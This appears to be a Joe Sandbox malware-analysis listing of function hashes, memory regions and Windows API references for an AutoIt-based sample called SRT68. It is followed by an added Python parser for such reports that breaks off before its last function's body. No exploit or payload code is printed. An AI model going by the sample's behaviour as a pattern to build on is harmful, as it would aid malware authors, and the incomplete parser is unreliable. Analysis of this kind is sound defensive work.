                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                      • Instruction ID: c7db986df3a87042823c09eaa46304b7afd2c0f8abbf447ecc89791cb938edfe
                                                                      • Opcode Fuzzy Hash: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                      • Instruction Fuzzy Hash: C2B0923105420AEBCA202F91E809B883F78EB44AE2F508010F64D84054CBE754508B91
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00FE3E62
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: 5509e694c18a0255459401e24e14f8eb6144df59b5e3b5de948f45ae2486b08b
                                                                      • Instruction ID: 6e729d9a8fd6327aaa937de596b08a7c1498d39dea93df2c32b92daf3320a977
                                                                      • Opcode Fuzzy Hash: 5509e694c18a0255459401e24e14f8eb6144df59b5e3b5de948f45ae2486b08b
                                                                      • Instruction Fuzzy Hash: 49A28DB5E00206CFCB24CF58C484AAEB7B2FF5A324F248069D955AB351D735ED46EB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                      • Instruction ID: 4fea84e222a24523393ba61589c6392c58e9fccf3702f440e28380b6dba1438f
                                                                      • Opcode Fuzzy Hash: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                      • Instruction Fuzzy Hash: C0322272D29F024DD7279534C932335A25DAFB73D4F14C73BE85AB59AAEB29C4835200
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                      • Instruction ID: 25b7becff4665a5e0b194fa5c32d95634a3e2ca783edef8b4866fdb2d62a19ef
                                                                      • Opcode Fuzzy Hash: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                      • Instruction Fuzzy Hash: 28B10131E2AF408DD72396398831336B65CAFBB2C5F51D71BFCA6B1D16EB2685835240
                                                                      APIs
                                                                      • __time64.LIBCMT ref: 0100889B
                                                                        • Part of subcall function 00FC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01008F6E,00000000,?,?,?,?,0100911F,00000000,?), ref: 00FC5213
                                                                        • Part of subcall function 00FC520A: __aulldiv.LIBCMT ref: 00FC5233
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                      • String ID:
                                                                      • API String ID: 2893107130-0
                                                                      • Opcode ID: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                      • Instruction ID: a744b049d1607cf10e70962d9c40b28320195866b0663cb0716f277ceaaf285f
                                                                      • Opcode Fuzzy Hash: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                      • Instruction Fuzzy Hash: 9B21AF32A256108BD72ACF29D441A52B3E1EBA5311F288E6DD1F5CB2C0CA35B905CB94
                                                                      APIs
                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01004C4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID:
                                                                      • API String ID: 2434400541-0
                                                                      • Opcode ID: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                      • Instruction ID: 8fa64b974c4e784b7a08462fc5a32d4556001ef10bcec07d370e257321aa5607
                                                                      • Opcode Fuzzy Hash: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                      • Instruction Fuzzy Hash: 57D05EA516461E78FCEE0B249A2FF7A15C8E3806C2FC081C973C1CA0C1ECC458404138
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FF8389), ref: 00FF87D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                      • Instruction ID: c45ea7ede5db869f9ad6826db7eebdd21c6579e56be73f10a9c1ee6bd5ee0580
                                                                      • Opcode Fuzzy Hash: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                      • Instruction Fuzzy Hash: 6DD05E3226050EABEF118EA4DD01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FCA12A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                      • Instruction ID: df8d1cde32827d8a0a777400c8f38732c52cfdf39c54ae69bd9c18336cb79aed
                                                                      • Opcode Fuzzy Hash: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                      • Instruction Fuzzy Hash: 72A0113000020EEB8A202E82E808888BFACEA002E0B008020F80C800228BB3A8208A80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                      • Instruction ID: 002a779c53e30318d232a434021657b496e268aa2cddefc306a81a40c710389d
                                                                      • Opcode Fuzzy Hash: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                      • Instruction Fuzzy Hash: 55224831D0414ADBDF388A16C4943BD77A9FF817A4F24406AD642CB5A2DB74AC82FF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction ID: 1c5189bf15134f41a52023c7b8e432b0353f148dc6f395ec35a4907960b732f9
                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction Fuzzy Hash: 55C1DA326050930AEF5D46398636A3EFBA1AEA37B131A075DD4B3CB1C5EE10C979E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction ID: a9662a08dcfd67055497935d93b8215c7e7ba5056ed95b67c277c4ba94e6c1e4
                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction Fuzzy Hash: 2FC1E93360515309EF6D4639C676A3EBAA1AE937B131A035DD4B3CB1C5EE20C978F660
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction ID: 2ba69262dfbd7e423e4fd111d6a8d04fc8aeef342fabb155543453edc4f57627
                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction Fuzzy Hash: 14C1A93260515309EF2D4639C636A3EBBA17EA37B131A075DD4B3CB1C6EE20C979E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: f215af0f08b041eaf68abc4941dae94a405734046930b57bbd76f36493fe1694
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 2F41C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 07d61b51aa0d18351697f984324d690fd8b027360d5f6591c14f7f50b87d4f54
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 92019278A00509EFCB84DF98D5D09AEF7F5FB48310F208599D819AB301D730AE41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: c3bc0f5b99e8445609e5172b9cb238679d2f561e2710f2de5d2b205e2b78a296
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: 6E019278A00509EFCB84DF98D5D09AEF7F5FB48310F208599D819AB301D730AE51DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 0101785B
                                                                      • DeleteObject.GDI32(00000000), ref: 0101786D
                                                                      • DestroyWindow.USER32 ref: 0101787B
                                                                      • GetDesktopWindow.USER32 ref: 01017895
                                                                      • GetWindowRect.USER32(00000000), ref: 0101789C
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010179DD
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010179ED
                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A35
                                                                      • GetClientRect.USER32(00000000,?), ref: 01017A41
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01017A7B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A9D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AB0
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017ABB
                                                                      • GlobalLock.KERNEL32(00000000), ref: 01017AC4
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AD3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 01017ADC
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AE3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 01017AEE
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B00
                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01032CAC,00000000), ref: 01017B16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 01017B26
                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01017B4C
                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01017B6B
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B8D
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017D7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                      • Instruction ID: a87312f6c36c32f77fd99472d3a018c78e3475eda366d1fe6951e28d8b0a2ef5
                                                                      • Opcode Fuzzy Hash: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                      • Instruction Fuzzy Hash: B002A27190010AEFDB24DFA8DC89EAE7BB9FF49350F148158F945AB294CB799D01CB60
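                                                                      Every function entry in this listing has the same shape: an optional APIs block of "Name.MODULE(args), ref: ADDR" lines, a Memory Dump Source block whose "based on PE" flag says whether the code sits in a PE-backed image region (here 00FA0000) or in a non-image region (here 015AE000), and a Similarity block carrying the API ID, Opcode ID and fuzzy hashes. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; it turns that text into records so you can pivot on Opcode IDs across reports, list the functions that call a given API, and pull out the functions found in non-PE-backed memory. The SAMPLE input is excerpted verbatim from the entries above, with one subcall line moved into the second entry so that case is exercised; the record field names are my own.

```python
"""Parse Joe Sandbox per-function Similarity blocks (text form) into dicts.

Added example, not Joe Sandbox code. SAMPLE is excerpted from the report
listing on this page; field names of the returned records are assumptions.
"""
import re
from typing import Dict, List

SAMPLE = """\
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01004C4A
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
• Instruction ID: 8fa64b974c4e784b7a08462fc5a32d4556001ef10bcec07d370e257321aa5607
• Opcode Fuzzy Hash: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
• Instruction Fuzzy Hash: 57D05EA516461E78FCEE0B249A2FF7A15C8E3806C2FC081C973C1CA0C1ECC458404138
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FF8389), ref: 00FF87D1
• DestroyWindow.USER32 ref: 0101787B
  • Part of subcall function 0102A8CA: GetSysColor.USER32(00000012), ref: 0102A903
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
• Instruction ID: c45ea7ede5db869f9ad6826db7eebdd21c6579e56be73f10a9c1ee6bd5ee0580
• Opcode Fuzzy Hash: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
• Instruction Fuzzy Hash: 6DD05E3226050EABEF118EA4DD01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
Memory Dump Source
• Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: f215af0f08b041eaf68abc4941dae94a405734046930b57bbd76f36493fe1694
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: 2F41C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
"""

# "Name.MODULE(args), ref: ADDR"; parens are absent when the call takes no
# recovered args, and nested calls are prefixed "Part of subcall function X: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SRC_RE = re.compile(r"^(?P<dump>\S+\.sdmp), Offset: (?P<off>[0-9A-F]+), based on PE: (?P<pe>true|false)$")
FIELDS = {"Snapshot File": "snapshot", "API ID": "api_id", "String ID": "string_id",
          "API String ID": "api_string_id", "Opcode ID": "opcode_id",
          "Instruction ID": "instruction_id", "Opcode Fuzzy Hash": "opcode_fuzzy",
          "Instruction Fuzzy Hash": "instruction_fuzzy"}
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def _new() -> Dict:
    return {"apis": [], "associated": [], "dump": None, "offset": None, "based_on_pe": None}


def parse_report(text: str) -> List[Dict]:
    """One record per function; the Instruction Fuzzy Hash line closes a record."""
    entries, cur = [], _new()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line or line in HEADINGS:
            continue
        m = API_RE.match(line)
        if m:
            args = [] if m["args"] is None else m["args"].split(",")
            cur["apis"].append({"api": m["api"], "module": m["mod"], "args": args,
                                "ref": m["ref"], "caller": m["caller"]})
            continue
        key, _, val = line.partition(":")
        val = val.strip()
        if val.endswith("Download File"):          # residue of the page's download links
            val = val[: -len("Download File")]
        if key == "Source File":
            s = SRC_RE.match(val)
            cur.update(dump=s["dump"], offset=int(s["off"], 16), based_on_pe=s["pe"] == "true")
        elif key == "Associated":
            cur["associated"].append(val)
        elif key in FIELDS:
            cur[FIELDS[key]] = val
            if key == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = _new()
    return entries


def functions_calling(entries: List[Dict], api: str) -> List[Dict]:
    """Functions whose own APIs block (not a subcall) references `api`."""
    return [e for e in entries if any(a["api"] == api and a["caller"] is None for a in e["apis"])]


def unbacked_functions(entries: List[Dict]) -> List[Dict]:
    """Functions the report found in memory not backed by a PE image."""
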